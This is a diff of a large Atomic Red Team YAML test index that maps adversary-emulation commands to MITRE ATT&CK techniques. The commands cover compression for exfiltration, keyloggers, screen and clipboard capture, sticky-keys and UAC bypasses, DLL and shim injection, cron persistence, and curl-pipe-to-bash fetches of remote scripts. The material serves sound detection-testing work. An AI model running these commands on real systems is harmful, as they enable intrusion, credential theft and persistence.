python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7543,7 +7543,7 @@ collection: mode='w').write('#{path_to_input_file}')\" \n" cleanup_command: 'rm #{path_to_output_file} -' + ' T1560.001: technique: created: '2020-02-20T21:01:25.428Z' 
@@ -7626,10 +7626,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7639,10 +7639,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | @@ -7662,10 +7662,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7703,11 +7703,11 @@ collection: dependencies: - description: 'Winzip must be installed -' + ' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' -' + ' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -7727,7 +7727,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation -' + ' supported_platforms: - windows input_arguments: 
@@ -7742,10 +7742,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) -' + ' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -7764,7 +7764,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. -' + ' supported_platforms: - linux - macos @@ -7781,11 +7781,11 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) -' + ' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip) echo Please set input_files argument to include files that exist @@ -7794,16 +7794,16 @@ collection: elevation_required: false command: 'zip #{output_file} #{input_files} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos 
@@ -7823,16 +7823,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) -' + ' cleanup_command: 'rm -f #{input_file}.gz -' + ' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos @@ -7848,28 +7848,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) -' + ' prereq_command: 'test -e #{input_file_folder} -' + ' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists -' + ' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration -' + ' supported_platforms: - macos - linux @@ -7892,7 +7892,7 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" executor: @@ -7906,7 +7906,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} -' + ' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -7956,7 +7956,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet -' + ' name: powershell T1119: technique: 
@@ -8026,7 +8026,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1 -' + ' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -8042,7 +8042,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null -' + ' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 @@ -8131,7 +8131,7 @@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. -' + ' supported_platforms: - windows executor: @@ -8141,14 +8141,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 -' + ' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it -' + ' supported_platforms: - windows executor: @@ -8171,7 +8171,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt -' + ' supported_platforms: - windows input_arguments: @@ -8183,7 +8183,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -8194,7 +8194,7 @@ collection: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -8204,7 +8204,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore -' + ' name: powershell T1213.001: technique: @@ -8354,7 +8354,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: @@ -8370,10 +8370,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -8926,7 +8926,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -9097,7 +9097,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -9116,14 +9116,14 @@ collection: dependencies: - description: 'Checking if pam_tty_audit.so is installed -' + ' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: 
@@ -9154,14 +9154,14 @@ collection: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. -' + ' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -9171,7 +9171,7 @@ collection: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND -' + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -9188,14 +9188,14 @@ collection: dependencies: - description: 'This test requires to be run in a bash shell -' + ' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' input_arguments: output_file: name: output_file @@ -9211,7 +9211,7 @@ collection: cat #{output_file} cleanup_command: 'rm #{output_file} -' + ' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. 
@@ -9219,20 +9219,20 @@ collection: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' input_arguments: user_account: description: Basic ssh user account for testing. @@ -9246,7 +9246,7 @@ collection: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ -' + ' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -9258,14 +9258,14 @@ collection: dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -9274,7 +9274,7 @@ collection: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd -' + ' T1557.001: technique: external_references: @@ -9448,17 +9448,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} -' + ' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore -' + ' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script -' + ' supported_platforms: - linux - macos 
@@ -9471,7 +9471,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} -' + ' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -9493,10 +9493,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force -' + ' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore -' + ' name: powershell T1114.001: technique: @@ -9567,23 +9567,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" -' + ' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} -' + ' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore -' + ' name: powershell T1185: technique: @@ -9923,7 +9923,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) -' + ' name: Screen Capture created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -9955,7 +9955,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: 
@@ -9966,16 +9966,16 @@ collection: executor: command: 'screencapture #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: @@ -9986,17 +9986,17 @@ collection: executor: command: 'screencapture -x #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud -' + ' supported_platforms: - linux input_arguments: @@ -10018,11 +10018,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -10030,14 +10030,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot -' + ' supported_platforms: - linux input_arguments: 
@@ -10048,28 +10048,28 @@ collection: dependencies: - description: 'ImageMagick must be installed -' + ' prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi -' + ' get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat -' + ' executor: command: 'import -window root #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour -' + ' supported_platforms: - windows input_arguments: @@ -10091,7 +10091,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore -' + ' - name: Windows Screen Capture (CopyFromScreen) auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 description: | @@ -10115,7 +10115,7 @@ collection: $bitmap.Save("#{output_file}") cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell T1213.002: technique: @@ -10505,7 +10505,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -10513,7 +10513,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -10547,7 +10547,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: 
@@ -10558,7 +10558,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1547.014: @@ -10817,11 +10817,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -10830,11 +10830,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -10842,10 +10842,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: 
@@ -10953,31 +10953,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -11175,7 +11175,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: 
@@ -11191,30 +11191,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -11311,7 +11311,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -11640,7 +11640,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -11662,7 +11662,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -11684,7 +11684,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -11707,7 +11707,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f 
@@ -11730,7 +11730,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -11778,7 +11778,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -11791,11 +11791,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -11842,7 +11842,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11853,7 +11853,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11878,7 +11878,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11889,7 +11889,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -11913,7 +11913,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11924,7 +11924,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11949,7 +11949,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11960,7 +11960,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11984,7 +11984,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11995,7 +11995,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12019,7 +12019,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12030,7 +12030,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -12055,7 +12055,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12066,7 +12066,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12091,7 +12091,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12102,7 +12102,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12216,7 +12216,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12261,7 +12261,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -12299,7 +12299,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12416,10 +12416,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1078.004: @@ -12485,7 +12485,7 @@ privilege-escalation: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -12520,20 +12520,20 @@ privilege-escalation: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1546.015: technique: external_references: @@ -12675,7 +12675,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -12686,17 +12686,17 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob 
@@ -12708,7 +12708,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -12719,20 +12719,20 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1134.002: @@ -12932,7 +12932,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -12952,7 +12952,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -12960,7 +12960,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -12992,7 +12992,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -13009,10 +13009,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 
